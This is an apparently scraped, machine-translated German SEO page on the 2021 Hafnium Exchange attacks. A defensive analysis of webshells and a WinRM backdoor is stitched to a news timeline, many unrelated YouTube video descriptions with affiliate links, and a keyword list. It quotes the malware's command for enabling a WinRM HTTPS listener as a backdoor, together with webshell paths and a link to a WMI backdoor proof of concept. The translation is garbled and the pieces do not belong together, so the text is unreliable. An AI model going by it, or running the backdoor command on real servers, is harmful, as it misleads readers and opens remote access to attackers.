So gibt es Skripte, aber auch ausführbaren Code oder ein „Verhalten“

Wenn zum Beispiel ein Prozess einen Dump des „LSASS“-Prozesses erstellt, um dann darin die Passwörter für andere Konten zu finden, dann ist das ein sehr ungewöhnlicher Vorgang

„Bessere“ Virenscanner überwachen nicht nur den Zugriff auf Dateien auf Viren und anderen Schadcode, sondern überwachen auch das Verhalten von Prozessen und wo Sie schreiben und lesen

Insofern ist es nicht verwunderlich, dass Defender und Sentinel nun eine solche Erkennung erhalten haben

Netzwerk-Firewall

Warum muss ein Exchange-Server überhaupt jeden Server über jeden Port erreichen können? Er muss nicht einmal „überall“ surfen können

Strenge „Netzwerk-Firewall“-Regeln und Proxy-Einstellungen sind wichtige Sicherheitsvorkehrungen, auch wenn dies mehr Wartungsaufwand bedeutet

Aber wenn eine WebShell “nach Hause telefoniert”, dann sollte das auffallen

Warum muss ein Exchange-Server überhaupt jeden Server über jeden Port erreichen können? Er muss nicht einmal „überall“ surfen können

Strenge „Netzwerk-Firewall“-Regeln und Proxy-Einstellungen sind wichtige Sicherheitsvorkehrungen, auch wenn dies mehr Wartungsaufwand bedeutet

Aber wenn eine WebShell “nach Hause telefoniert”, dann sollte das auffallen

Codesignatur

Warum kann ein nicht autorisierter Prozess ausführbare Dateien irgendwo ablegen, wenn es sich nicht um Administrator- oder Windows-Updates handelt? Wäre es nicht möglich, „Code Signing“ auf Servern vorzuschreiben, selbst wenn die Administratoren dann auch noch ihre Powershell-Skripte signieren müssten

Natürlich ist es immer noch ein Hase-und-Igel-Spiel, aber wenn ein solcher Angriff bekannt wird und die AV-Hersteller den Schaden begrenzen können, ist schon viel gewonnen

Solche Produkte könnten auch erkennen, wenn neue, unbekannte Prozesse gestartet werden oder wenn ausführbare Dateien in Verzeichnissen auftauchen, die eigentlich „statisch“ sind und nur dann beschrieben werden, wenn Updates oder Service Packs geplant sind

Ich bin jedoch realistisch genug, dass Sie nicht mit AppLocker auf dem Server arbeiten möchten

Aber eine Protokollierung von „Dateiänderungen“ in extern zugänglichen Pfaden oder kritischen Konfigurationseinstellungen wäre ein hilfreiches Produkt

Natürlich können Sie auch beginnen, Netzwerkübertragungen, IIS-Protokolle usw

aufzuzeichnen und so Ihre Server und Clients zu “profilieren”

Größere Abweichungen sind dann zumindest ein Hinweis darauf, genauer hinzusehen

Allerdings gibt es nie einen 100%igen Schutz und es herrscht ständiger Wettbewerb

Bisher muss ich sagen, dass ich mich noch nicht um einen Exchange-Server gekümmert habe, der verdächtige Dateien hatte

Entweder war ich beim Patchen schneller oder die Angreifer hatten aufgrund des Volumens einfach keine Zeit, sich mit meinen Instanzen auseinanderzusetzen

Leider ist dies nicht der Regelfall und diverse Leser der MSXFAQ haben mir ihre Erfahrungen geschildert, die ich hier auszugsweise und ohne Quellenangabe wiedergebe..

…ich habe zwei Webshells auf einem Exchange 2013 gefunden und das waren sie nicht vom aktuellen AV erkannt, aber vom aktuellen Microsoft Safety Scanner (Build 1.331.2674.0) und sofort entfernt

Ich habe den Exchange 2013 erst am 06.03.2021 gepatcht und da war es schon viel zu spät!!!. ..

Der Microsoft Security Scanner hat unter anderem Folgendes entfernt:

Beginnen Sie mit „Entfernen“ für file://\\?\C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\xxx\xxx\App_Web_djrsiry5.dll Der Vorgang sollte später abgeschlossen werden nächsten Neustart

Starten Sie „remove“ für file://\\?\C:\inetpub\wwwroot\aspnet_client\supp0rt.aspx Starten Sie „remove“ für file://\\?\C:\inetpub\wwwroot\aspnet_client\sol.aspx Für die Reinigung von Backdoor:MSIL/Chopper.F!dha muss das System neu gestartet werden

Exploit gefunden: ASP/CVE-2021-27065.B!dha und entfernt!

Laut Virustotal war die Erkennungsrate auch am 8

März noch sehr gering

Nur 5 von 59 Engines erkennen diese Web-Shell

Es könnte auch sein, dass die Angreifer, die über einen solchen „Schatz“ verfügen, eine große Anzahl leicht modifizierter Web-Shells verwendet haben und daher überhaupt keine schädliche Komponente vorhanden ist

Im Gegensatz zu den zunächst eingesetzten ausgefeilten PowerShell-Payloads gibt es mittlerweile auch Angriffe mit einfachen CMD-Shells, die sehr veraltet aussehen

Dieser Batch erstellt zwei temporäre BAT-Dateien, von denen eine “nur” Informationen sammelt

Der “CHOICE”-Befehl als Verzögerung funktioniert mit den Parametern auf meinem Testsystem nicht

PING wird dann weiter unten als Verzögerung verwendet

Anstelle eines “arp -a” hätte ich PowerShell verwendet, um das Subnetz zu scannen und einen LDAP-Export mitzunehmen

Es kommt mir eher vor wie zusammenkopiert oder Jahrzehnte, aber das macht es nicht weniger gefährlich

Da die Lücke mittlerweile aber vielen Angreifern bekannt ist, werden wir es mit ganz unterschiedlichen Schadensmustern zu tun haben

Diese Hintertür MUSS bei ihnen nicht vorhanden sein, aber sie KANN vorhanden sein

Danke an “Carsten E” für den Tipp

Interessant ist der Abschnitt mit WinRM, der einen Listener auf Port 443 aktiviert

So sieht es auf einem Standardserver aus

PS C:\> winrm enumerate winrm/config/listener Listener Address = * Transport = HTTP Port = 5985 Hostname Enabled = true URLPrefix = wsman CertificateThumbprint ListeningOn = 127.0.0.1, 192.168.13.16, ::1, fe80::5efe:192.168. 13.16%14, fe80::b4db:e7c3:55c4:1d8c%12 PS C:\> winrm get winrm/config/service Service RootSDDL = O:NSG:BAD:P(A;;GA;;;BA)( A;;GR;;;IU)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD) MaxConcurrentOperations = 4294967295 MaxConcurrentOperationsPerUser = 1500 EnumerationTimeoutms = 240000 MaxConnections = 300 MaxPacketRetrievalTimeSeconds = 120 AllowUnencrypted = false Auth Basic = false Kerberos = true Negotiate = true Certificate = false CredSSP = false CbtHardeningLevel = Relaxed DefaultPorts HTTP = 5985 HTTPS = 5986 IPv4Filter = * IPv6Filter = * EnableCompatibilityHttpListener = false EnableCompatibilityHttpsListener = false CertificateThumbprint AllowRemoteAccess = true

Der Schadcode ändert dies in:

C:\>WinRM set winrm/config/service @{EnableCompatibilityHttpsListener = “true”}

Damit wird WinRM über 443 erreichbar und sozusagen auch von außen

(Siehe drittletzte Zeile)

netsh http show servicestate Serversitzungs-ID: FE00000520000003 Version: 1.0 Zustand: Aktiv Eigenschaften: Maximale Bandbreite: 4294967295 Zeitüberschreitungen: Entitätstext-Timeout (Sek.): 120 Entitätstext-Timeout (Sek.): 120 Anforderungswarteschlangen-Timeout (Sek.): 120 Leerlaufverbindung Timeout (Sek.): 120 Header Wait Timeout (Sek.): 120 Minimale Senderate (Bytes/Sek.): 150 URL-Gruppen: URL-Gruppen-ID: FD00000540000001 Status: Name der aktiven Anforderungswarteschlange: Die Anforderungswarteschlange ist unbenannt

Eigenschaften: Maximale Bandbreite: vererbt Max

Verbindungen: vererbt Timeouts: Timeout-Werte vererbt Anzahl registrierter URLs: 3 Registrierte URLs: HTTPS://+:443/WSMAN/ HTTP://+:5985/WSMAN/ HTTP:// +: 47001/WSMAN/

Wenn Sie keinen Reverse-Proxy mit URL-Filterung vor Ihrem Exchange Server haben und somit den Zugriff auf „/WSMAN“ verhindern, dann ist Ihr Exchange Server trotzdem über WinRM erreichbar

Der Angreifer hat eine Hintertür, wenn er sich die Zugangsdaten vorher beschaffen kann, z

über SAM-Export oder LSASS-Dump

Es reicht aber auch für einen DoS-Angriff auf Passwörter

Das kannst du ganz einfach extern testen:

PS C:\>invoke-webrequest “https:///WSMAN” # kommt ein “404 not found” Fehler, ist das OK # kommt ein “405 Method no allowed”, dann ist die Backdoor verfügbar PS C:\>invoke-webrequest “https:///WSMAN” -method POST # kommt ein “404 not found” error, dann das OK # kommt ein “503 Service unavailable”, dann war’s das auch OK# kommt ein “401 unautorisiert”, dann steht die Hintertür zur Verfügung

Wenn WSMAN nicht ausgeführt wird, wird der Fehler 404 im IISLog angezeigt

Wenn WSMAN aktiv ist, wird NICHTS vom IIS protokolliert, da “http.sys” die Anfrage bereits umleitet

Das Ausschalten ist einfach:

WinRM legt winrm/config/service @{EnableCompatibilityHttpsListener = “false”} fest

WinRM – Windows-Remoteverwaltung

Installation und Konfiguration für die Windows-Remoteverwaltung

https://docs.microsoft.com/en-us/windows/win32/winrm/installation-and-configuration-for-windows-remote-management

Dieses Skript zeigt aber auch, dass Malware irgendwo ein Skript ablegt und es über den Taskplaner weit in der Zukunft ausführen lässt

Mit bekannten Schadprogrammen begnügen sich die Angreifer jedoch nicht

Am 20

März, also 18 Tage später, erhielt ich von anderen Lesern der MSXFAQ die Information, dass Angreifer auch ausführbare Programme auf Domänencontrollern abgelegt hätten und diese von installierten Virenscannern schlecht erkannt würden

Man sollte also trotzdem davon ausgehen, dass eine solche offene Tür von immer mehr Angreifern genutzt wird, die ihre Malware immer wieder leicht verändern, um den Virenscanner zumindest für ein paar Tage auszutricksen

Das bedeutet nicht, dass Virenscanner wirkungslos sind

Sie können jedoch nur „bekannte“ Malware erkennen

Eine “Verhaltenskontrolle” scheint noch mehr Marketing zu sein

So einfach wäre es, zumindest auf Servern aber auch Workstations, die Speicherung von ausführbarem Code mit einer Abfrage zu versehen

Quasi “EXE Account Control” analog zu “User Account Control”

Andere Leser haben mir berichtet, dass nun auch bei Kunden “WMI Backdoors” gefunden wurden

WMI-Hintertür

https://github.com/matterstation/WMI_Backdoor

Einen Proof of Concept hat Black 2015, der natürlich auch von den Angreifern genutzt wird

Der Download und das Entpacken der PS1-Datei wurde von Windows Defender nicht blockiert

Eine weitere Nutzlast ist der Code von „CobaldStrike“

Eigentlich ein Framework zum Aufspüren von Sicherheitslücken, aber es enthält auch einen Agenten, der auch missbraucht werden kann

Der Quellcode wurde wahrscheinlich im November 2020 geleakt

Angeblicher Quellcode des Cobalt Strike-Toolkits wurde online geteilt

https://www.bleepingcomputer.com/news/security/alleged-source-code-of-cobalt-strike-toolkit-shared-online/

https://www.bleepingcomputer.com/news/security/alleged-source-code-of-cobalt-strike-toolkit-shared-online/ Cobalt Strike (kommerziell)

home

https://de.wikipedia.org/wiki/Cobalt_Strike

Dementsprechend gibt es Regeln zur Erkennung für Yara und Thor Lite

Erkennung von Cobalt Strike mit Speichersignaturen

https://www.elastic.co/de/blog/detecting-cobalt-strike-with-memory-signatures

https://www.elastic.co/de/blog/detecting-cobalt-strike-with-memory-signatures Defences against Cobalt Strike

https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence/blob/main/README.md

Auch die „Miner“ wurden besser

Anstatt mit hoher und damit auffälliger CPU-Last nach Bitcoins zu schürfen, scheinen Monereo-Minder mit niedriger CPU-Priorität eingesetzt zu werden, damit sie nicht so schnell auffallen

Sie sollten gelegentlich die Prozesse auf Ihrem Exchange-Server überprüfen und die ausgehenden Verbindungen kontrollieren

Siehe auch Hafnium-Nachbearbeitung

Sowohl Microsoft als auch die Entdecker der Schwachstelle haben umfangreiche Hintergrundartikel geschrieben.

Exchange HAFNIUM Timeline \u0026 Expanded Breach Information New Update

Video ansehen

Neues Update zum Thema exchange hafnium update

Connecting With Us
—————————————————
+ Hire Us For A Project: https://lawrencesystems.com/hire-us/
+ Tom Twitter 🐦 https://twitter.com/TomLawrenceTech
+ Our Web Site https://www.lawrencesystems.com/
+ Our Forums https://forums.lawrencesystems.com/
+ Instagram https://www.instagram.com/lawrencesystems/
+ Facebook https://www.facebook.com/Lawrencesystems/
+ GitHub https://github.com/lawrencesystems/
+ Discord https://discord.gg/ZwTz3Mh
Lawrence Systems Shirts and Swag
—————————————————
►👕 https://teespring.com/stores/lawrence-technology-services

AFFILIATES \u0026 REFERRAL LINKS
—————————————————
Amazon Affiliate Store
🛒 https://www.amazon.com/shop/lawrencesystemspcpickup
All Of Our Affiliates that help us out and can get you discounts!
🛒 https://www.lawrencesystems.com/partners-and-affiliates/
Gear we use on Kit
🛒 https://kit.co/lawrencesystems
Try ITProTV free of charge and get 30% off!
🛒 https://go.itpro.tv/lts
Use OfferCode LTSERVICES to get 5% off your order at
🛒 https://www.techsupplydirect.com?aff=2
Digital Ocean Offer Code
🛒 https://m.do.co/c/85de8d181725
HostiFi UniFi Cloud Hosting Service
🛒 https://hostifi.net/?via=lawrencesystems
Protect you privacy with a VPN from Private Internet Access
🛒 https://www.privateinternetaccess.com/pages/buy-vpn/LRNSYS
Patreon
💰 https://www.patreon.com/lawrencesystems

Links
https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
https://www.theverge.com/2021/3/8/22319934/microsoft-hafnium-hack-exchange-server-email-flaw-white-house
https://krebsonsecurity.com/2021/03/a-basic-timeline-of-the-exchange-mass-hack/
John Hammond’s \”Analysis – Post-Exploitation from Microsoft Exchange HAFNIUM\”
https://youtu.be/rn-6t7OygGk

exchange hafnium update Sie können die schönen Bilder im Thema sehen

 Update  Exchange HAFNIUM Timeline \u0026 Expanded Breach Information
Exchange HAFNIUM Timeline \u0026 Expanded Breach Information Update

Der Hafnium Exchange-Server-Hack: Anatomie einer … Update New

11.03.2021 · Der Hafnium Exchange-Server-Hack: Anatomie einer Katastrophe. Das Vorspiel. Die Angriffe. Massenscans seit Februar. Auf einer Seite lesen. Als …

+ Details hier sehen

Read more

Als Microsoft am 3

März 2021 vier Schwachstellen in Microsofts Exchange Server 2010 bis 2019 mit einem außerplanmäßigen Sicherheitsupdate schloss, stellte der Hersteller die Bedrohung noch als recht gering dar

Inzwischen läuft eine beispiellose Angriffswelle gegen die entsprechenden Exchange-Instanzen und das Bundesamt für Sicherheit in der Informationstechnik (BSI) ruft Alarmstufe Rot aus

Microsoft macht eine mutmaßlich staatsnahe, von China aus operierende Gruppe namens Hafnium für die Angriffe verantwortlich

Doch es mehren sich Stimmen, die zumindest einen Teil der Verantwortung bei Microsoft sehen

Eine Analyse der Prozesse zeigt warum.

Das Vorspiel

Sicherheitsforscher des in Taiwan ansässigen Unternehmens Devcore untersuchten die Sicherheit von Exchange-Systemen und stießen am 10

Dezember 2020 auf die erste Schwachstelle CVE-2021-26855 namens ProxyLogon

Dadurch können Angreifer die reguläre Authentifizierung umgehen und sich als Exchange-Server-Administrator anmelden

Im Rahmen der Untersuchung fanden die Sicherheitsforscher eine weitere Schwachstelle, die sie nutzen könnten, um Dateien zur Remote Code Execution (RCE) in Exchange abzulegen

Daraus bauten sie einen funktionierenden Proof-of-Concept-Exploit

Dadurch konnte die Exchange-Authentifizierung umgangen und der Server kompromittiert werden

Am 5

Januar 2021 informierten sie das Microsoft Security Resource Center (MSRC), wie von Devcore auf der Proxylogon-Seite dokumentiert

Lesen Sie auch Windows 10: März-Updates können Bluescreens beim Drucken verursachen

Das MSRC bestätigte die Schwachstellen und den PoC im Zeitraum 6.-8

Januar 2021, stellte aber erst Anfang Februar 2021 ein Sicherheitsupdate bereit

Auf Nachfrage der Sicherheitsforscher hieß es, dass verschiedene Aspekte zur individuellen Überprüfung aufgeteilt worden seien

Microsoft hat versprochen, mindestens einen Fix vor Ablauf der Frist zur Veröffentlichung der Schwachstelle zu veröffentlichen

Im Zuge der Korrespondenz hat Microsoft am 18

Februar den 9

März 2021 (Patchday) als Veröffentlichungsdatum für Exchange-Sicherheitsupdates bekannt gegeben

Doch dann hat Microsoft die Sicherheitsupdates außerplanmäßig am 3

März 2021 zusammen mit einer Sicherheitswarnung freigegeben

Die Angriffe

Der Zeitablauf wird explosiv, wenn man die Angriffe über die am 3

März 2021 geschlossenen Exchange-Schwachstellen vergleicht, wie es der US-Sicherheitsblogger Brian Krebs in seiner Timeline des Exchange-Massenhacks tut

Bereits am 6

Januar 2021 beobachtete das Sicherheitsunternehmen Volexity Angriffe über eine bisher nicht öffentlich bekannte Schwachstelle auf Exchange-Servern

Da Microsoft alles und jedes Produkt mit Telemetrie abhört und große Anwender angeblich mit Defender Advanced Threat Protection schützt, stellt sich die Frage: „Sind diese Tools blind für so etwas, oder haben sie nur in Redmond geschlafen?“

Am 27

Januar 2021 informierten jedenfalls Sicherheitsforscher der Firma Dubex Microsoft über aktive Angriffe auf Exchange-Server

Bereits am 29

Januar 2021 berichtete Trend Micro in einem Blogbeitrag über Angreifer, die über Schwachstellen eine Web-Shell als Backdoor auf Exchange-Servern installierten

Von diesem Zeitpunkt an hätte der Praktiker es als „die Hütte brennt“ beschrieben

Am 2

Februar 2021 warnte Volexity auch Microsoft.

HAFNIUM Exchange Server 0-Day Exploits – Patching \u0026 Recovery Update

Video unten ansehen

Weitere Informationen zum Thema exchange hafnium update

Recently, Hafnium has engaged in a number of attacks using previously unknown exploits targeting on-premises Exchange Server software. This attack is causing major impacts and disruptions and is burdening On-premises Exchange Server messaging solution. Based upon the impact of the attack, the recovery methods to bring back the service \u0026 data may vary. In addition to the Hafnium information, a recovery solution with stellar repair for exchange is also added.
Link for Stellar Repair for Exchange:
https://www.stellarinfo.com/edb-exchange-server-recovery.htm?
Link Microsoft Docs:
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers

exchange hafnium update Einige Bilder im Thema

 Update  HAFNIUM Exchange Server 0-Day Exploits - Patching \u0026 Recovery
HAFNIUM Exchange Server 0-Day Exploits – Patching \u0026 Recovery Update

Weitere Informationen zum Thema anzeigen exchange hafnium update

Hafnium Update: Continued Microsoft Exchange … New

Updating

+ ausführliche Artikel hier sehen

HAFNIUM – Post-Exploitation Analysis from Microsoft Exchange Update

Video ansehen

Weitere Informationen zum Thema exchange hafnium update

If you would like to support the channel and I, check out Kite! Kite is a coding assistant that helps you code faster, on any IDE offer smart completions and documentation. https://www.kite.com/get-kite/?utm_medium=referral\u0026utm_source=youtube\u0026utm_campaign=johnhammond\u0026utm_content=description-only (disclaimer, affiliate link)
For more content, subscribe on Twitch! https://twitch.tv/johnhammond010
If you would like to support me, please like, comment \u0026 subscribe, and check me out on Patreon: https://patreon.com/johnhammond010
PayPal: https://paypal.me/johnhammond010
E-mail: [email protected]
Discord: https://johnhammond.org/discord
Twitter: https://twitter.com/_johnhammond
GitHub: https://github.com/JohnHammond

exchange hafnium update Einige Bilder im Thema

 Update  HAFNIUM - Post-Exploitation Analysis from Microsoft Exchange
HAFNIUM – Post-Exploitation Analysis from Microsoft Exchange Update

Hafnium: Nächste Schritte nach dem Update der Exchange Server Update New

10.03.2021 · Hafnium: Nächste Schritte nach dem Update der Exchange Server. 10. März 2021. Microsoft hat mehrere Sicherheitsupdates für Microsoft Exchange Server veröffentlicht. Die Updates schließen Sicherheitslücken, die in einigen Fällen für gezielte Attacken genutzt wurden. Aktuell betroffen von der Schwachstelle sind die lokalen Exchange Server …

+ hier mehr lesen

Urgent Panel Discussion: Microsoft Exchange Hafnium Compromise New Update

Video unten ansehen

Neue Informationen zum Thema exchange hafnium update

Critical Insight hosts a panel discussion about the Microsoft Exchange Hafnium Compromise

exchange hafnium update Sie können die schönen Bilder im Thema sehen

 Update  Urgent Panel Discussion: Microsoft Exchange Hafnium Compromise
Urgent Panel Discussion: Microsoft Exchange Hafnium Compromise New

Patch now! Exchange servers attacked by Hafnium … New

Updating

+ mehr hier sehen

Upgrade DAG Member from CU11 to CU15 Exchange 2016 Update

Video unten ansehen

Weitere hilfreiche Informationen im Thema anzeigen exchange hafnium update

A database availability group (DAG) is a set of up to 16 Exchange Mailbox servers that provides automatic, database-level recovery from a database, server, or network failure. DAGs use continuous replication and a subset of Windows failover clustering technologies to provide high availability and site resilience.
All wanted files in this link
https://mega.nz/#F!uKhHWAAK!e0LyW54K7ZD69sL4xTuWyA
For the latest Vulnerabiltity:
1. For exchange server 2019 :
Please upgrade to CU 8 then use this security patch link :
https://www.microsoft.com/download/details.aspx?familyid=18c75641-e53d-4979-8d5e-29a80674e41f
and
for CU 7 please use this security patch link:
https://www.microsoft.com/download/details.aspx?familyid=2aadda14-b8aa-4370-a492-0a6818facce8
2. For exchange server 2016:
Please upgrade to CU 19 then use this security patch link:
https://www.microsoft.com/download/details.aspx?familyid=31211a48-0cef-462e-bb11-c36440f80bb3
and
for CU18 please use this security patch link:
https://www.microsoft.com/download/details.aspx?familyid=192fa60f-664a-4f3e-b19f-e295135e469b

the full link for the update package for all exchange servers:
https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b

exchange hafnium update Ähnliche Bilder im Thema

 Update  Upgrade DAG Member from CU11 to CU15 Exchange 2016
Upgrade DAG Member from CU11 to CU15 Exchange 2016 Update

Hafnium: Spionage in Microsoft Exchange | IT-Markt New

Updating

+ ausführliche Artikel hier sehen

Analysis of the Hafnium attack on MS Exchange Servers Update

Video unten ansehen

Neue Informationen zum Thema exchange hafnium update

The Virsec Security Lab has analyzed and recreated the attacks allegedly perpetrated by the Hafnium hacking group exploiting vulnerabilities in Microsoft Exchange. This video steps through all the steps of the Kill Chain and highlights where Virsec can stop these attacks.

exchange hafnium update Ähnliche Bilder im Thema

 Update  Analysis of the Hafnium attack on MS Exchange Servers
Analysis of the Hafnium attack on MS Exchange Servers Update

Exchange Sicherheitsvorfall HAFNIUM! Was tun? – IT … New Update

Updating

+ hier mehr lesen

How to install Microsoft Exchange Server security updates to protect against threats Update

Video unten ansehen

Neues Update zum Thema exchange hafnium update

This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065.
In this video, we demonstrate how apply the necessary security updates to your Microsoft Exchange Server to prevent adversaries from exploiting these vulnerabilities. While this will help prevent future compromise, it is also necessary to investigate whether compromise has already occurred. See Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities (https://msrc-blog.microsoft.com/2021/03/16/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/#How_do_I_mitigate_the_threat) for additional details.
DISCLAIMER: This video and its contents are subject to the Microsoft Terms of Use (https://www.microsoft.com/en-us/legal/intellectualproperty/copyright). All code and scripts are subject to the applicable terms on Microsoft’s GitHub Repository (e.g., the MIT License).
For security reasons, never browse and download security updates directly on your Microsoft Exchange Server. Download and copy the update to your Microsoft Exchange Server from another machine.
Learn more: https://aka.ms/exchangevulns
► Subscribe to Microsoft Security on YouTube here: https://aka.ms/SubscribeMicrosoftSecurity
► Follow us on social:
LinkedIn: https://www.linkedin.com/showcase/microsoft-security/
Twitter: https://twitter.com/msftsecurity
► Join our Tech Community: https://aka.ms/SecurityTechCommunity
► For more about Microsoft Security: https://msft.it/6002T9HQY
#MicrosoftSecurity #Patches

exchange hafnium update Einige Bilder im Thema

 Update  How to install Microsoft Exchange Server security updates to protect against threats
How to install Microsoft Exchange Server security updates to protect against threats Update

+++UPDATE+++ – Kritische Sicherheitslücken in … New

Updating

+ mehr hier sehen

81. How to Install Cumulative Update 7 on Exchange Server 2019 New

Video ansehen

Weitere Informationen zum Thema exchange hafnium update

Microsoft Exchange 2019 Beginners Video Tutorials Series:
This is a step by step guide on How to install cumulative updates 7 for Exchange Server 2019 to update the exchange server 2019 to the latest version.
Follow my blogs:
https://msftwebcast.com

exchange hafnium update Einige Bilder im Thema

 Update  81. How to Install Cumulative Update 7 on Exchange Server 2019
81. How to Install Cumulative Update 7 on Exchange Server 2019 New

Microsoft releases a one-click patch for its critical … Neueste

Updating

+ hier mehr lesen

Installing Cumulative Updates on Exchange Server 2019 New Update

Video ansehen

Neue Informationen zum Thema exchange hafnium update

In this tutorial, we will teach you how to Installing Cumulative Updates on Exchange Server 2019
CU Download link: https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019
Command:
setup.exe /PrepareSchema /IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF
setup.exe /PrepareAD /IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF
setup.exe /PrepareDomain /IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF
If you found this video valuable, give it a like.
If you know someone who needs to see it, share it.
Leave a comment below with your thoughts.
Add it to a playlist if you want to watch it later.

Subscribe Here:https://www.youtube.com/networkingbitsabbirkhan
**Follow me Socially 😀
Sabbir Ahmed Khan- https://goo.gl/dMwKcM (FB)
For more Tips Tutorial- http://networkingbit.info
**Facebook page: https://goo.gl/drRSZ3
**Twitter : https://goo.gl/mxp7Au
**Google+ : https://goo.gl/pfkggD
😊 like ✅ subscribe ✅ bell 🔔 ✅ ♥️
Please Like, Subscribe and Share our tutorials 🙂

exchange hafnium update Sie können die schönen Bilder im Thema sehen

 New  Installing Cumulative Updates on Exchange Server 2019
Installing Cumulative Updates on Exchange Server 2019 Update

Der Hafnium Exchange-Server-Hack: Anatomie einer … New Update

11.03.2021 · Der Hafnium Exchange-Server-Hack: Anatomie einer Katastrophe. Das Vorspiel. Die Angriffe. Massenscans seit Februar. Auf einer Seite lesen. Als …

+ Details hier sehen

How to Install Cumulative Update 21 on Exchange Server 2016 Update

Video unten ansehen

Weitere hilfreiche Informationen im Thema anzeigen exchange hafnium update

#Exchange Server Administration course – https://course.techijack.com
Join this channel to get access to perks:
https://www.youtube.com/channel/UCzLjnWKomfzXm78-Atb-iCg/join
Welcome To Youtube Channel Techi Jack For Technical Deep Knowledge.
Description: In this video tutorial of Exchange server 2016 by techi jack, you will see the demonstration of how to install cumulative update 21 on exchange server 2016. At the time of video creation, cu 21 is the latest cumulative update for the Microsoft Exchange server 2016.
First, we have to upgrade and extend Microsoft active directory schema to support the new version of the exchange installation.
After the schema upgrades and updating Microsoft active directory by running the prepareAD command, we can install the cumulative updates for Microsoft Exchange.
Note: Before proceeding with the exchange server upgrade process, make sure that your windows server 2016 operating system is up to date.
I assure you that, after watching this video from techi jack youtube channel, Microsoft exchange expert. You will be able to successfully upgrade your Exchange Server to the latest cumulative updates.
About This Channel
Microsoft Certified Trainer (MCT), MCSA \u0026 MCSE Productivity \u0026 Messaging
For Support, Email: [email protected], https://support.techijack.com
Complete training for windows server, Exchange Server, MCSE, and other technical Knowledge related to IT, like cloud computing, Seo, Google Ads, Microsoft 365, Hybrid Configuration, and Microsoft Azure, etc.
You can contact for Microsoft Exchange Server Support, Exchange Server Consulting \u0026 office 365 assistance and support as well.
Whenever it is possible, I try to create a real-world scenario for better understanding.
Website: https://techijack.com
Website: https://course.techijack.com,
Website: https://tools.techijack.com/
Want to deploy exchange 2016/19 yourself with assistance, contact [email protected]

https://www.facebook.com/Techi-Jack-2244739159188581
https://www.linkedin.com/company/techi-jack?trk=d_public_post_follow_view_profile

exchange hafnium update Einige Bilder im Thema

 New  How to Install Cumulative Update 21 on Exchange Server 2016
How to Install Cumulative Update 21 on Exchange Server 2016 Update

Hafnium – Patch for Server 2013 only with installed CU 23 … New

08.03.2021 · We have planned to install an Exchange Server 2016 and move all mail boxes to that server and uninstall Ex2013 but that was planned for next week so we are now in a bad situation. Does someone know if this update only works with CU 23 installed and if that is true, how can we minimize the threat for our EX 2013 ?

+ Details hier sehen

Patch your On-Premise Exchange Servers – High Priority Update New

Video unten ansehen

Neues Update zum Thema exchange hafnium update

Hafnium – Exchange and vulnerability and solution explained
Summary – https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/?wt.mc_id=AID3019004_EML_7383190
Exchange Server Build Numbers – https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN\u0026view=exchserver-2019
Security Update Guide – https://msrc.microsoft.com/update-guide/
SU Description – https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b

exchange hafnium update Einige Bilder im Thema

 New  Patch your On-Premise Exchange Servers - High Priority
Patch your On-Premise Exchange Servers – High Priority New Update

Aktualisieren von Exchange auf das neueste … Update

Updating

+ hier mehr lesen

Exchange 2013 Sp1 Upgrading For Cumulative Update 6 Update

Video unten ansehen

Neue Informationen zum Thema exchange hafnium update

download Cumulative Update 6 for Exchange Server 2013 (KB2961810)\r
http://www.microsoft.com/en-us/download/details.aspx?id=44022\r
fix list can be found here http://support.microsoft.com/kb/2961810

exchange hafnium update Sie können die schönen Bilder im Thema sehen

 New Update  Exchange 2013 Sp1 Upgrading For Cumulative Update 6
Exchange 2013 Sp1 Upgrading For Cumulative Update 6 Update

Dies ist eine Suche zum Thema exchange hafnium update

exchange 2010 hafnium patch
exchange hafnium patch
hafnium exchange server hack
hafnium exchange hack
hafnium exchange 2010
hafnium exchange cve
hafnium check
microsoft exchange hafnium

Sie haben das Thema also beendet exchange hafnium update

Articles compiled by Musicsustain.com. See more articles in category: MMO

Leave a Comment